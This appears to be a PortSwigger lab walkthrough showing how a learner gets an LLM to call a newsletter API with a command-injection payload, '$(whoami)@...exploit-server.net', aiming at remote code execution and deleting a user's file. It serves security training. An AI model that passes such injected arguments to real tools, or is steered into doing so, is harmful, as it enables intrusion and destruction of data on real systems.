Lab: Exploiting vulnerabilities in LLM APIs

This lab contains an OS command injection vulnerability that can be exploited via its APIs. You can call these APIs via the LLM.

https://portswigger.net/

Ask the LLM what APIs it has access to. The LLM responds that it can access APIs controlling the following functions:

• Password Reset

• Newsletter Subscription

• Product Information

Consider the following points:

• You will probably need remote code execution to delete Carlos' morale.txt file. APIs that send emails sometimes use operating system commands that offer a pathway to RCE.

• Since you don't have an account, testing the password reset will be challenging. The Newsletter Subscription API is a better initial testing target.

• Ask the LLM what arguments the Newsletter Subscription API takes.

• Ask the LLM to call the Newsletter Subscription API with the argument attacker@YOUR-EXPLOIT-SERVER-ID.exploit-server.net.

• Click Email client  and observe that a subscription confirmation has been sent to the email address as requested. This proves that you can use the LLM to interact with the Newsletter Subscription API directly.

• Ask the LLM to call the Newsletter Subscription API with the argument $(whoami)@YOUR-EXPLOIT-SERVER-ID.exploit-server.net.

• Click Email client and observe that the resulting email was sent to carlos@YOUR-EXPLOIT-SERVER-ID.exploit-server.net